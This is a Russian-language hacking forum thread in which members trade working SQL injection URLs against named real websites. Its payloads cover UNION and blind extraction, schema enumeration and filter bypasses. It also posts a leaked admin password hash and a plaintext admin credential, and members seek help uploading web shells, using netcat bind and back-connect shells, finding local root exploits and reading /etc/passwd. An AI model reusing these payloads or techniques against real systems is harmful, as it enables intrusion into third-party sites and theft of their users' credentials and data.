http://fantasysportsinsider.com/index.php?option=com_feeds&task=headline&headline=-141060/**/union/**/select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,version(), 16,17,18,19,20,21,22,23,24,25--+&totalItems=3709&pageID=2

5.0.67-community



Получается во все эти базы зайти нельзя, не в одну? а как их тогда вообще открывают?

С ними работает сервер линейки я же написал. Сайт вообще мог бы быть построен на mysql и не иметь никакого отношения к л2 серверу. Впрочем иногда бывает что данные для статистики (как правило подробной, например в личном кабинете - содержимое инвентаря, количество пвп\пк) берется прямо из этих баз... здесь как видишь доступа к этим базам нету

@Imperou$
у меня Forbidden, попробуй регистрт UnIoN+sElEcT или union%0aselect

http://fantasysportsinsider.com/index.php?option=com_feeds&task=headline&headline=-141060/**/union/**/select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,version(), 16,17,18,19,20,21,22,23,24,25--+&totalItems=3709&pageID=2

5.0.67-community


ElteRUS я невнимательный идиот.Спасибо большое, а ларчик просто открывался :)

http://www.customoutfitters.com/co_home/products.php?productCat=4

Стоит PostgreSql.Кто может раскрутить ? На все запросы к бд реагирует молча =_=

http://www.customoutfitters.com/co_home/products.php?productCat=4+and+ascii(substring((sel ect+version()),0,1))>1

PostgreSQL 8.1.3

http://www.customoutfitters.com/co_home/products.php?productCat=4+and+ascii(substring((sel ect+tablename+from+pg_tables+limit+1+offset+0),1,1 ))>1

Дальше сам

мне кажется что просто здесь идет филтр на from такое возможно? чем его можно заменить?
хоть я не очень дружу с MSSQL но так на вскидку:
смотрим базы доступные текушему пользователю(0- нет доступа, 1 - доступ есть):

http://darkomen.ru/?go=19&indx=-11+union+all+select+1,2,HAS_DBACCESS(DB_NAME(0)),4 ,5,6,7,DB_NAME(0),9,1,1,1--

lin2world - 1
master - 1
tempdb - 1
model - 0
msdb - 1
lin2db - 0
lin2comm - 0
l2gloss - 0
lin2world - 1
lin2log - 0
lin2clancomm - 0
смотрим таблички и колонки доступные текушему пользователю

http://darkomen.ru/?go=19&indx=-1+union+select+1,2,QUOTENAME(TABLE_NAME),4,5,6,7,Q UOTENAME(COLUMN_NAME),9,1,1,1+from+INFORMATION_SCH EMA.COLUMNS--

крч ничего особено хорошего нету.

Господа, помогите с таким вопросом.
На чем построена система скачки файлов сайта ... допустим http://ikino.by/ ?
Вот - http://ikino.by/download/ns_echelon_conspiracy_2009_dvdscr.avi.html сама система получения\верификации полученного по СМС кода.
Что это за система? На чем построена? Есть ли известные способы обхода данной системы?
Может кто что знает.
Заранее спасибо за ответ.

Я вытащил базу аккаунтов, жалко паролей нету((

__http://darkomen.ru/?go=19&indx=-1+union+select+1,2,QU OTENAME(TABLE_NAME),4,5,6,7,Q UOT ENAME(COLUMN_NAME),9,1,1,1+from+INFORMATION_SCH EMA.C O LUMNS--

может кто нить подскажет к можно пароли найти? нашел все аккаунты их ид даты создания, а поролей и ящиков нету((

Тебе же популярно все обьяснили и разжували - нету доступа к определеным БД где скорее всего и храниться пароли и мыла и тп, копай теперь в направлении выполнения команд через mssql.

может кто ткнет в носом с статью в которой расматривается октрытие порта на удаленном сервере, конект к данному порту неткатом. и т..д..
(зі ткните в меня этим неткатом, поиск дает лишь кмс неткат)

к сожалению кроме двух видео ничего не нашел.
спасибо.

https://forum.antichat.ru/showthread.php?t=26510
статья не айс, почитай все комменты, что не поймешь - уже спрашивай

Подскажите можно ли что-нибудь с этого поиметь?)
http://s44.radikal.ru/i104/0903/22/5a2ad14fb351t.jpg (http://radikal.ru/F/s44.radikal.ru/i104/0903/22/5a2ad14fb351.jpg.html)

Подскажите можно ли что-нибудь с этого поиметь?)
http://s44.radikal.ru/i104/0903/22/5a2ad14fb351t.jpg (http://radikal.ru/F/s44.radikal.ru/i104/0903/22/5a2ad14fb351.jpg.html)
Укажи в хосте(для бд) свой хост где разрешен конект с удаленых машин, установи -зайди в админку и залей шелл, верни назад все назад.

http://www.vurv.cz/index.php?key=section&id=5%20or%201=@@version--

помогите плиз раскрутить дальше а то я не силёт в MS SQL

F4R
тоесть. "ты не силён" ? А статьи почитать? вот подробный мануал, вопросы после прочтения:
https://forum.antichat.ru/thread30501.html

А если тебе нужно просто . что-бы кто-то за тебя всё сделал, то ты разделом ошибся, а возможно и форумом

fedi, http://www.sendspace.com/file/1heu65 - сервер л2. Смотри папку DBScript, там .sql файлы - изучай структуру бд сервера. Тогда не будет вопросов где лежат пароли и почему их нельзя достать.

F4R, http://www.vurv.cz/index.php?key=section&id=5+union+select+null,null,null,null,table_name+f rom+information_schema.tables

Но статью всеровно почитай. И это тоже http://msdn.microsoft.com/ru-ru/library/bb418490.aspx :)

F4R, http://www.vurv.cz/index.php?key=section&id=5+union+select+null,null,null,null,table_name+f rom+information_schema.tables

спс Держи ++++

http://dental.medicum.ee/index.php?sisu=tekst&mid=109

-109+union+select+concat_ws(kasutajanimi,0x3a,passw ord) from kasutajad--

Таблица есть,но данные не выбираются.Количество полей верно.Я так понял,что она пустая ?

http://dental.medicum.ee/index.php?sisu=tekst&mid=109

-109+union+select+concat_ws(kasutajanimi,0x3a,passw ord) from kasutajad--

Таблица есть,но данные не выбираются.Количество полей верно.Я так понял,что она пустая ?


table admin_login
admin:de5b25fb43c11d610a26449661dd28c8:lasesisse

видимо да, пустая твоя табличка.

http://dental.medicum.ee/index.php?sisu=tekst&mid=109

-109+union+select+concat_ws(kasutajanimi,0x3a,passw ord) from kasutajad--

Таблица есть,но данные не выбираются.Количество полей верно.Я так понял,что она пустая ?

не ответ на вопрос, но вроде неправильно использована ф-я CONCAT_WS(separator,str1,str2,...)

http://dev.mysql.com/doc/refman/5.0/en/string-functions.html#function_concat-ws

На запрос www.......&sid=115' в браузере ваваливается следующее:

Can not select table: SELECT * FROM ofagp WHERE id=115\' and enable=1 and language=2 ORDER BY od asc

Подскажите что здесь можно сделать чтобы раскрутить sql инъекцию?

На запрос www.......&sid=115' в браузере ваваливается следующее:

Can not select table: SELECT * FROM ofagp WHERE id=115\' and enable=1 and language=2 ORDER BY od asc

Подскажите что здесь можно сделать чтобы раскрутить sql инъекцию?

читай тут - http://forum.antichat.ru/thread43966.html
и тут - http://forum.antichat.ru/thread104591.html

и вообще много статей про Sql inj

У кого опыта побольше,помогите плиз раскрутить скулю, уже минут 30 бьюсь, безрезультатно... :'(
http://texeyes.com/contact.php?d=5'

слепая походу!
http://texeyes.com/contact.php?d=5%27+and+1=2
http://texeyes.com/contact.php?d=5%27+and+1=1
разные ответы

слепая походу!
http://texeyes.com/contact.php?d=5%27+and+1=2
http://texeyes.com/contact.php?d=5%27+and+1=1
разные ответы
А разве может быть слепая, если ошибка вываливается? o_O
Это ты показал, что скуля вообще есть, а то что она есть я и так знаю, исходя из ошибки :)

2Imperou$
http://texeyes.com/contact.php?d=5+and+1=1/* получилась тока слепая скуля)

))) что ты понимаешь под слепой скулей?) то что ее на ощупь нада раскручивать одной интуицией где даже ошибки не выводятся?)

так не ругается

http://texeyes.com/contact.php?d=5+union+select+1,2,3,4,5,6+--+

А так идет перенаправление

http://texeyes.com/contact.php?d=5+order+by+1+--+

Может по union select побрутить?

2Imperou$
http://texeyes.com/contact.php?d=5+and+1=1/* получилась тока слепая скуля)

))) что ты понимаешь под слепой скулей?) то что ее на ощупь нада раскручивать одной интуицией где даже ошибки не выводятся?)

Я считал, что слепая скуля, это когда вывод ошибок отключён.Например возвращает разные результаты, а не обязательно интуицией.Если ошибаюсь-поправьте, я далеко не спец.
И ещё,я попросил помочь раскрутить, а не советы.Что это скуля я знаю и так.А блинд она или нет, это другой вопрос вроде.
Версия 5.0.67-community, больше ничего не узнал =(

2 Imperrous

так же как ты узнал версии тащи таблы из information_schema.tables и колонки из information_schema.column

2 Imperrous

так же как ты узнал версии тащи таблы из information_schema.tables и колонки из information_schema.column
Да ну я не совсем уж нуб.Версию узнал со скули с другого сайта на серваке, но дело в том, что с неё ничего не вытянешь.Доступа к мускул.юзер нет, файл прив отключён, таблиц с админскими и юзерскими данными тоже нет, один мусор и всего то пару таблов.

а если при введении адреса http://la2.sz.ru/viewpage.php?u=xsnepx&page_id=99999 выводит "Невозможно получить содержание страницы" это может быть уязвимостью?

EP']а если при введении адреса http://la2.sz.ru/viewpage.php?u=xsnepx&page_id=99999 выводит "Невозможно получить содержание страницы" это может быть уязвимостью?
Нет ЭТО не уязвимость.

Почему при заходе в http://video.antichat.ru с юзер агентом <script></script> и <?php?> (только с тегами script и пхп) выпадает 500 ошибко, как я понимаю 500 ошибку может быть вызывать и скрипт(не обязательно само по) который как то выпадает в зависимости от настроек, или это типа такая зашита?

Access denied for user 'apache'@'localhost' (using password: NO) - эта ошибка значит что Логин пользователя бд = apache, а бд находится на том же компьютере что и сайт? тоесть остаётся только пасс подобрать? ?*??

EP']Access denied for user 'apache'@'localhost' (using password: NO) - эта ошибка значит что Логин пользователя бд = apache, а бд находится на том же компьютере что и сайт? тоесть остаётся только пасс подобрать? ?*??
нет, это значит, что в скрипте ошибка или просто слетели настройки, и функция mysql_connect() вызывается без параметров.

Люди! Подскажите алгоритм взлома web сервака. Я начинающий в этом деле.но нескажу что полный ламер.Я знаю C++,немного html и жабаскрипт. Какие есть способы? помоему я слышал что можно двумя способами web взлом и ломать сервесы на сервере через порты.Мож ктонить расскажет или даст ссылку пожалуйста.

Способов миллиард. Поищи по ключ. фразам "MySQL Injection", "XSS", "PHP Include (локальный, удаленный)". Для начала. А потом я бы поучился metasploit'ом пользоваться. XSpider скачай, почитай про него... Все обсуждалось миллион раз. ;)

XSpider скачай, почитай про него... Не качай XSpider !! Тем более если хочешь чему нибудь научиться.

P.S.
Для начала почитай:

https://forum.antichat.ru/thread20140.html

https://forum.antichat.ru/thread43966.html

https://forum.antichat.ru/thread54355.html
https://forum.antichat.ru/thread56756.html
https://forum.antichat.ru/thread89082.html

hi there

http://www.nbt.tj/?c=44&id=44&a=-1+union+select+1,version(),3,4,5/*

portbld-freebsd6.2
nbt@localhost
4.0.27
nbt

дальше не идет... не могу получить имена столбцов в таблице.
у кого получится, киньте в личку, как сделали...

Привет
Вопрос по HTTP 1.1, а конкретно про метод PUT

Почему могу с почью PUT создать txt и не могу создать asp? можно ли это обойти другими методами (copy, move, unlock .....)?

второй вопрос. имеется файл web.config или xxx.asp. При COPY в txt - ошибка. Я так понемаю такая же причина что и в первом вопросе.

Есть ли какие мнения?

hi there

http://www.nbt.tj/?c=44&id=44&a=-1+union+select+1,version(),3,4,5/*

portbld-freebsd6.2
nbt@localhost
4.0.27
nbt

дальше не идет...
у кого получится, киньте в личку, как сделали...

там я так смотрю очень права порезаны. остается подбор таблиц - 2 уже есть - выводятся при не правельном запросе. можно еще поиграться с INSERT, LOAD_FILE - но не думаю что из этого что либо получится - все из-за тех же прав.

2 Imperrous

Мне кажется что там вообще нет sql inj. ошибки работы скрипта.

_http://www.nbt.tj/?c=44&id=44&a=-1+union+select+1,column_name,3,4,5'/*

_http://www.nbt.tj/?c=44&id=44&a=-1+union+select+1,column_name,3,4,5'/*

Тут к information_schema нет прав. Это значит, надо брутить имена талиц и столбцов. Я б SIPTом пробежал, по словарю.

Привет я только начинаю изучать SQL-inj и по этому прошу вас помочь.

http://www.bookstreet.ru/prod_show.php?object_uid=2'

Почему не идёт? Или не стоило мне браться за MS SQL? (в запросах MS SQL не силён вообще)

помогите раскрутить (:
http://www.danieldefo.ru/gallery.html?top=1'
Она слепая?)

http://siovizcenter.ucsd.edu/admin/
rnewman:hot98DOG

Как сюда шелл залить? Возможно?

Привет я только начинаю изучать SQL-inj и по этому прошу вас помочь.

http://www.bookstreet.ru/prod_show.php?object_uid=2'

Почему не идёт? Или не стоило мне браться за MS SQL? (в запросах MS SQL не силён вообще)

http://www.bookstreet.ru/prod_show.php?object_uid=2+order+by+2--
если больше 2 - то ошибка
The ORDER BY position number 3 is out of range of the number of items in the select list.

а дальше вот что
'=' - режет
'select' -режет (видно из запроса http://www.bookstreet.ru/prod_show.php?object_uid=2+union+select+1,2'-- )
Unclosed quotation mark before the character string '2 union 1,2\' '.

как видно SELECT в запросе убран

тк = режется использовать можно <>

http://www.bookstreet.ru/prod_show.php?object_uid=2+and+1<>@@version--
а дальше читай тут

http://injection.rulezz.ru/MSSQL-ASP-Injection.html

+++AndreyDevil+++, не смотрел. но попробуй залить как картинку, или побалуйся с расширением файла.
sj666, какая ж она слепая?))
_http://www.nbt.tj/?c=44&id=44&a=-1+union+select+1,column_name,3,4,5'/*
версия бд - 4.0.27-log. а инф.схема появляеться только в пятой.

faza02,дело в том что он заливает .php но при переходе link становится такого вида http://siovizcenter.ucsd.edu/rq/_getImage.php?libid=223 и предлагает мне скачать шелл )

значит ищи в attachements ... я щас просто на работе, был бы дома проверил бы сам все ...

+++AndreyDevil+++, не смотрел. но попробуй залить как картинку, или побалуйся с расширением файла.
sj666, какая ж она слепая?))

Цитата:
_http://www.nbt.tj/?c=44&id=44&a=-1+union+select+1,column_name,3,4,5'/*

версия бд - 4.0.27-log. а инф.схема появляеться только в пятой.

http://www.nbt.tj/?c=44&id=44&a=-1+union+select+1,2,3,4,5+from+informarion_schema.t able/*

MySQL Error: Access denied for user: 'nbt@localhost' to database 'informarion_schema'

бывает и в 4))))))))

помогите раскрутить (:
http://www.danieldefo.ru/gallery.html?top=1'
Она слепая?)

ОЧЕНЬ ДАЖЕ ЗРЯЧАЯ))) только вот limit с union не дружит (как мне помнится) и or/and не льзя использовать.

Хотелось бы и самому узнать что в таких случаях сделать можно

http://www.nbt.tj/?c=44&id=44&a=-1+union+select+1,2,3,4,5+from+informarion_schema.t able/*



бывает и в 4))))))))
Не хочу тебя растраивать но не бывает в MySQL 4 ветки INFORMATION.SCEMATA а то что она тебе пишет Access denied совсем не означает что данная бд существует:
http://www.nbt.tj/?c=44&id=44&a=-1+union+select+1,2,3,4,5+from+AkyHa_MaTaTa.My_HeRo/*
Во всем виноваты подлые гранты если бы не они нам бы прямо в лицо сказали - ни какой ты не HeRo.

2 AkyHa_MaTaTa.My_HeRo

спс - буду знать

2 +++AndreyDevil+++
Я так и не нашел где заливается - может плохо искал. Зато нашел SQL
http://siovizcenter.ucsd.edu/admin/selectedAnnounce.php?ID=35'/*
может пригодится

faza02,дело в том что он заливает .php но при переходе link становится такого вида http://siovizcenter.ucsd.edu/rq/_getImage.php?libid=223 и предлагает мне скачать шелл )

судя по всему скрипт _getImage.php берет реальный путь к файлу из базы. с помощью sql inj - можно поискать в базе этот путь и обратиться к шеллу напрямую. кроме того как вариант в базу можно ввести libid допустим 55555 и путь к файлу допустим /etc/passw njulf при обращении _getImage.php?libid=55555 будешь качать файл passwd

http://www.zork.name/?view=1%27

судя по всему скрипт _getImage.php берет реальный путь к файлу из базы. с помощью sql inj - можно поискать в базе этот путь и обратиться к шеллу напрямую. кроме того как вариант в базу можно ввести libid допустим 55555 и путь к файлу допустим /etc/passw njulf при обращении _getImage.php?libid=55555 будешь качать файл passwd
вроде как, файлы хранятся в базе, а не линки.
http://siovizcenter.ucsd.edu/rq/_getImage.php?libid=-223+union+select+null,111111111,null/*

прав на mysql.user нет
file_priv N

обычная скуля ,с не совсем обычным выводом.

http://siovizcenter.ucsd.edu/rq/_getImage.php?libid=-223+union+select+null,version(),null/*
4.1.22-log

судя по всему скрипт _getImage.php берет реальный путь к файлу из базы. с помощью sql inj - можно поискать в базе этот путь и обратиться к шеллу напрямую. кроме того как вариант в базу можно ввести libid допустим 55555 и путь к файлу допустим /etc/passw njulf при обращении _getImage.php?libid=55555 будешь качать файл passwd
Хоть 5555 ставь хоть 1111 хоть etc/passwd всё равно шелл качает )

http://www.zork.name/?view=1%27

слепая(могу ошибаться, но фантазии не хватает)
http://www.zork.name/?view=1)+and+substring(version(),1,1)=5--+

только вот limit с union не дружит
лимит с ордером не дружит.

Порылся в исходном коде...вот:



session_set_cookie_params(3600);
session_start();

if(isset($_SESSION['username']) && strlen($_SESSION['username']) && isset($_SESSION['password']) && strlen($_SESSION['password']))
{
$s_username = $_SESSION['username'];
$s_password = $_SESSION['password'];

include("include/mysql_connect.php");

$result = mysql_query("SELECT user_id, level FROM Users WHERE username='$s_username' && password=Password('$s_password')");
while($row = mysql_fetch_array($result))
{
$userid = $row["user_id"];
$s_user_id = $row["user_id"];
$s_level = $row["level"];
}
$num = mysql_num_rows($result);

if($num == 0)
{
header("Location: error2.php");
exit();
}
elseif($num == 1)
{
$course_id = $_REQUEST['course_id'];
if(!is_numeric($course_id))
{
$course_id = 0;
}
if($s_level == 0)
{
$result1 = mysql_query("SELECT * FROM Courses_Users WHERE user_id='$s_user_id' && course_id='$course_id'");
$num_c = mysql_num_rows($result1);
}
if($s_level > 0)
{
$result1 = mysql_query("SELECT * FROM Courses WHERE teacher='$s_user_id' && course_id='$course_id'");
$num_c = mysql_num_rows($result1);
}

$num_c = mysql_num_rows($result1);

if($num_c == 0)
{
header("Location: error2.php");
exit();
}
}
else
{
header("Location: index.php");
exit();
}
}
else
{
header("Location: index.php");
exit();
}
?>



Реально ли здесь провести sql inj ? Проверок нету,разве что на существование.

И ещё вопросег: там проверка course_id идёт только на то.является ли значение числом...можно ли это обойти ?

Офф имеется...А при mysql_quotes_gpc = On какой был бы вариант ?

ЗЫ: на этапе $s_username = $_SESSION['username']; можно вместо username подставить запрос?

Почему возникает ошибка при таком запросе?
Что-то в синтаксисе не так?

http://www.moviead.com/display.cfm?id=-1+union+select+1,2,3,COLUMN_NAME,5,6,7,8,9,10,11,1 2+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME ='users'+LIMIT+1,1--

Реально ли здесь провести sql inj ? Проверок нету,разве что на существование.

И ещё вопросег: там проверка course_id идёт только на то.является ли значение числом...можно ли это обойти ?
Сессия храниться на сервере со всеми данными а пользователь лишь передает ее индетификатор, так что думай

2Byrger без кавычек
Unknown column 'users' in 'where clause'

2 Byrger
А ты кавычки ' замени на "

http://www.moviead.com/display.cfm?id=-1+union+select+1,2,3,COLUMN_NAME,5,6,7,8,9,10,11,1 2+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME =%22users%22+LIMIT+1,1--

типа так!

Мм, я недавно начал заниматься sql inj поэтому туплю маленько.
Вот например пытаюсь подобрать кол-во столбцов в db_galery
http://www.danieldefo.ru/gallery.html?top=1;-- UNION SELECT 1 --
Ошибки нет, возвращается так же страница =\

Почему возникает ошибка при таком запросе?
Что-то в синтаксисе не так?

http://www.moviead.com/display.cfm?id=-1+union+select+1,2,3,COLUMN_NAME,5,6,7,8,9,10,11,1 2+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME ='users'+LIMIT+1,1--
http://www.moviead.com/display.cfm?id=-1+union+select+1,2,3,COLUMN_NAME,5,6,7,8,9,10,11,1 2+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME =CHAR(117,115,101,114,115)+LIMIT+1,1--

http://supertractor.ru/index.php?rshow=price&act=viewcat&cid=-1+union+select+1,COLUMN_NAME,3,4+FROM+information_ schema.columns+WHERE+table_name=%22mailing_admin%2 2--

А тут почему не читает? (слепая скуля)

http://supertractor.ru/index.php?rshow=price&act=viewcat&cid=-1+union+select+1,COLUMN_NAME,3,4+FROM+information_ schema.columns+WHERE+table_name=0x6d61696c696e675f 61646d696e--

http://supertractor.ru/index.php?rshow=price&act=viewcat&cid=-1+union+select+1,COLUMN_NAME,3,4+FROM+information_ schema.columns+WHERE+table_name=0x6d61696c696e675f 61646d696e--
А где переводить в такую бяку?

Мм, я недавно начал заниматься sql inj поэтому туплю маленько.
Вот например пытаюсь подобрать кол-во столбцов в db_galery
http://www.danieldefo.ru/gallery.html?top=1;-- UNION SELECT 1 --
Ошибки нет, возвращается так же страница =\
Ты закрываешь коментом свой запрос вот он и проходит, вобше уязвимый параметр у нас в limit:

The LIMIT clause can be used to constrain the number of rows returned by the SELECT statement. LIMIT takes one or two numeric arguments, which must both be non-negative integer constants (except when using prepared statements).


2Byrger это не слепая, переводить можно и так(php)
echo "0x".bin2hex("здесь пишем чего хотим перевисти");

А где переводить в такую бяку?

https://forum.antichat.ru/showpost.php?p=1151651&postcount=657

http://www.danieldefo.ru/gallery.html?top=1



После непродолжительных работ, сайт откроектся =)
Оставайтесь с нами!


Для тех, кто не знает кто такой даниельдефо - погуглите =)

А инъекция после лимита возможна. Более чем )

s_p_a_m
Там INSERT
http://www.zork.name/?view=2)+and+substring(version(),1,1)=(5

вот перебор, если нужен
http://www.zork.name/?view=2)+AND+ascii(lower(substring((select+table_n ame+from+information_schema.tables+limit+17,1),1,1 )))<(53

===============================
А инъекция после лимита возможна. Более чем )
Давай посмотрим реализацию :) Например тут:

http://www.ngo-monitor.org/articles.php?article_type=op-eds&type=whatsnew&limit=140'

http://www.ngo-monitor.org/articles.php?article_type=op-eds&type=whatsnew&limit=140,2--+

Ну или твой вариант с удовольствием посмотрю. С "ORDER BY", что-бы всё как положено :)

А инъекция после лимита возможна. Более чем )
INSERT? или есть еще что интересного?

Давай посмотрим реализацию Например тут:

http://www.ngo-monitor.org/articles.php?article_type=op-eds&type=whatsnew&limit=140'

http://www.ngo-monitor.org/articles.php?article_type=op-eds&type=whatsnew&limit=140,2--+

Ну или твой вариант с удовольствием посмотрю. С "ORDER BY", что-бы всё как положено

Да я то же хочу посмотреть!!!!!

С "ORDER BY", что-бы всё как положено :)

Если в запросе есть ордей бай то нельзя. Ну мне нужно было конкретизировать, сори что ввел вас в заблуждение :)

http://pastebin.com/m19eaa637


Переменная form_number не проходит фильтрацию...Но я так понял,что даже если она и уязвима,то вывода не будет ?

$result = mysql_query("INSERT INTO Users
(firstname,lastname,school_id,description,email,us ername,password)
VALUES
('$firstname','$lastname','$school_id','$form_numb er','$email','$username',
Password('$password'))");


В school_id только XSS...

В остальных переменных режутся хтмл и пхп strip_tags() функцией...не знаю,что и делать.Что касается проверки длины полей хтмл формы,то проверка идёт только на уровне приложения,а сервер отдыхает...Хотя бы поле password. Может,кто найдёт здесь sql inj или щё что-нибудь интересное ?

ПЫСЫ: Если что, то приму минусы в подарок,если написал не туда,куда полагается...

http://www.gmpr.ru/news_item.php?id=699'


А дальше не воспринимает....
http://www.gmpr.ru/news_item.php?id=699+group+by+400--

http://pastebin.com/m19eaa637


Переменная form_number не проходит фильтрацию...Но я так понял,что даже если она и уязвима,то вывода не будет ?

$result = mysql_query("INSERT INTO Users
(firstname,lastname,school_id,description,email,us ername,password)
VALUES
('$firstname','$lastname','$school_id','$form_numb er','$email','$username',
Password('$password'))");




если $form_number уязвима и MySQL поддерживает подзапросы + кавычки не слешируються то можешь зделать своеобразный вывод в пользовательских профиле(естественно это имеет смысл еслу тебя есть доступ к данным пользователя), то есть что то типо такого:

$form_number = 1',(select concat_ws(0x3a,user,password,host) from mysql.user limit 1),'dodik','pass' /*

потом ишешь пользователя dodik и по идее у него в мыли будет лежать наш подзапрос.

http://www.gmpr.ru/news_item.php?id=699'


А дальше не воспринимает....
http://www.gmpr.ru/news_item.php?id=699+group+by+400--
там же видно по ошибке что переменая вставляеться в кавычке:
http://www.gmpr.ru/news_item.php?id=699123123'+union+select+1,2,conca t_ws(0x3A,user(),@@version,database()),4,5,6,7,8,9 ,10--+

Если в ошибки от скули приходит с + то как поставить пробел?

ov/'+group+by+1--/'
И она не воспринимает --

Если в ошибки от скули приходит с + то как поставить пробел?

ov/'+group+by+1--/'
И она не воспринимает --
Когда в MySQL используешь комент -- то после него надо ставить пробел --+, судя по всему скуля у тебя в чпу можешь попробывать использывать /**/ вместо пробелов, а в качестве комента закрываюшего оставшийся запрос - #( беда с # в том что браузер может воспринять # как анкор поэтому обычно вставляют %23 ) и если у тебя логика(считай регулярка) чпу требует что бы переменная которая вставляеться в запрос находилась между // то у тебя например когда ты делаешь вот так : /**/order/**/by/**/1#/(потому как пробелы не urldecode то и %23 наверно так и останиться %23) в качестве значения переменой пойдет ** в запрос, можешь попробывать %20 вместо пробелов(хотя если производилось urldecode запроса то и + могли бы пройти), вообшем с чпу не всегда все просто и понятно, единственым решением являеться прямое обрашения к скрипту с передачей ему нужных значений как это делает чпу что не всегда возможно по ряду причин.

Когда в MySQL используешь комент -- то после него надо ставить пробел --+, судя по всему скуля у тебя в чпу можешь попробывать использывать /**/ вместо пробелов, а в качестве комента закрываюшего оставшийся запрос - #( беда с # в том что браузер может воспринять # как анкор поэтому обычно вставляют %23 ) и если у тебя логика(считай регулярка) чпу требует что бы переменная которая вставляеться в запрос находилась между // то у тебя например когда ты делаешь вот так : /**/order/**/by/**/1#/(потому как пробелы не urldecode то и %23 наверно так и останиться %23) в качестве значения переменой пойдет ** в запрос, можешь попробывать %20 вместо пробелов(хотя если производилось urldecode запроса то и + могли бы пройти), вообшем с чпу не всегда все просто и понятно, единственым решением являеться прямое обрашения к скрипту с передачей ему нужных значений как это делает чпу что не всегда возможно по ряду причин.

ov/'%20%23/**/+--+group+by+1--+/'

ov/'+group+by+1%23/'
Вообще не как не пускает....а запрос выгледит так..

SELECT `ID`, `Name` FROM `menu` WHERE roup_ID` = '2' AND `Active` = '1' AND `URL` = '/arti....erov/'/**/group/**/by/**/1+--+/'

В ошибке он ругается на /' тоесть похоже что запросе не прерывется (MySQL стоит...)

ну ты же видешь что после -- у нас идет + а должен быть пробел, попробуй так '/**/group/**/by/**/1/*/, и если подерживаеться union - '/**/union/**/select/**/1,2/*/ может последний слеш и не нужен, судя по запросу если он действительно полный то можно обойтись и вообше без коментов
'/**/union/**/select/**/1,2/**/'/

SELECT `ID`, `Name` FROM `menu` WHERE roup_ID` = '2' AND `Active` = '1' AND `URL` = '/arti....erov/'/**/union/**/select/**/1,2/**/'/'

а вообше вылаживай линк или в пм раз сайт пентагона под прицелом.

Вопрос, это бага или нет?
http://aeiou.visao.pt/gen.pl?p=users&op=view&user=12849'

не sql injec


И ещё, как ведёт себя perl с иньекциями? (если как то ведёт вообще) и где можно почитать об этом.Просто ни разу не сталкивался...

так же как и php и asp
sql injec - проблема не интерпритации языков а проблема запросов (в основном)

где можно почитать об этом
google рулит

Imperou$, естественно прав нехватает. повышай.

2 inperous

Не хватает прав. Тут как вариант - бекконект или бинд шелл - локальный сплойт что бы поднятся до рута

ph1l1ster
Как?

id - покажет права
uname -a - версию ядра

google.com - ищи сплойты под версию ядра

есть много способов по поднятию прав.

один из них - https://forum.antichat.ru/nextoldesttothread17443.html

http://www.steadygroup.com/articledetails.php?id=314+and+substring(version(), 1,1)>1

Как эту расскрутить? Тут скобки фильтруются, чтоли?

Да, режет скобки (обе) и звездочки тоже (причем граммотно режет, захексенные тоже)

Так, может пригодится:

http://www.steadygroup.com/articledetails.php?id=-314+or+1=0

http://www.steadygroup.com/articledetails.php?id=-314+or+1=1

В качестве фильтра вроде # катит

http://www.steadygroup.com/articledetails.php?id=314+and+substring(version(), 1,1)>1

Как эту расскрутить? Тут скобки фильтруются, чтоли?


5 версия.... есть information_schema

http://www.steadygroup.com/articledetails.php?id=-314+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,TABLE_NAME,28+ FROM+information_schema.tables--+

А что, без скобок уже скули не модно крутить? :)

http://www.steadygroup.com/articledetails.php?id=-314%20UNION%20SELECT%201,@@version,3,4,5,6,7,8,9,1 0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26, 27,28--

http://www.steadygroup.com/articledetails.php?id=-314%20UNION%20SELECT%201,table_name,3,4,5,6,7,8,9, 10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 ,27,28+from+information_schema.tables--

Подскажите плз сплоит под Linux 2.6.28.7, я чо то на милворме копаюсь и не могу найти... Или подойдёт любой под Linux 2.6.x ? Я просто ни разу не юзал =)
raptor_chown подойдёт (он вроде под 2.6.x)? И где можно скачать, ребяят.Отплюсую, ну оч надо.

http://www.google.com/search?hl=ru&client=opera&rls=ru&hs=OuP&num=100&q=2.6.28+local+root+exploit&btnG=%D0%9F%D0%BE%D0%B8%D1%81%D0%BA&lr=

http://www.google.com/search?hl=ru&client=opera&rls=ru&hs=OuP&num=100&q=2.6.28+local+root+exploit&btnG=%D0%9F%D0%BE%D0%B8%D1%81%D0%BA&lr=
Ни одного под эту версию не увидел! Я гуглил по этому запросу, ничего толком не обнаружил, поэтому и спрашивал, необходим сплоит именно под версию Linux 2.6.28, или можно и 2.6.x ????
Так ничего и не вывалилось... =(
И ещё вопрос, забиндил, подконнектился неткатом, проверяю >
which gcc
выдаёт
which: no gcc in (/bin:/usr/bin)
как быть? =(
Как можно ещё поднять права до рута?

Поищи тут http://milw0rm.com/search.php - введи в поиск Linux

http://milw0rm.com/exploits/5093

отпиши плз если получится каким сплойтом....

which gcc
выдаёт
which: no gcc in (/bin:/usr/bin)
как быть? =(
Как можно ещё поднять права до рута?

если нет возможности скомпелировать на этой машине сплойт - можно на другой linux'овой машине. Да и в винде можно - лишь бы все библиотеки были. Есть такой компилятор lccwin32. им можно попробовать. Потом заливаешь бинарник и исполняешь.

Если хостер при вводе FROM перекидывает с сайту на траницу где бла бла бла вы хакер
Как можно обойти?

Byrger
Не знаю как насчёт "бла бла бла вы хакер", но например СпейсВеб при реагирует на "union select from" и выбрасывает вот сюда:
http://sweb.ru/insecure

Это обходится POST, разумеется если это возможно.

Если ты о чём то другом, то нужно смотреть что именно фильтруется, пробовать POST, возможно фильтрация только с пробелом , как реагирует на регистр и т.д. Вариантов масса.

если открыл info.php что я могу оттуда почерпнуть для sql иньекции:

mysql
MySQL Support enabled
Active Persistent Links 0
Active Links 0
Client API version 5.0.67
MYSQL_MODULE_TYPE external
MYSQL_SOCKET /tmp/mysql.sock
MYSQL_INCLUDE -I/usr/local/include/mysql
MYSQL_LIBS -L/usr/local/lib/mysql -lmysqlclient

mysql
MySQL Support enabled
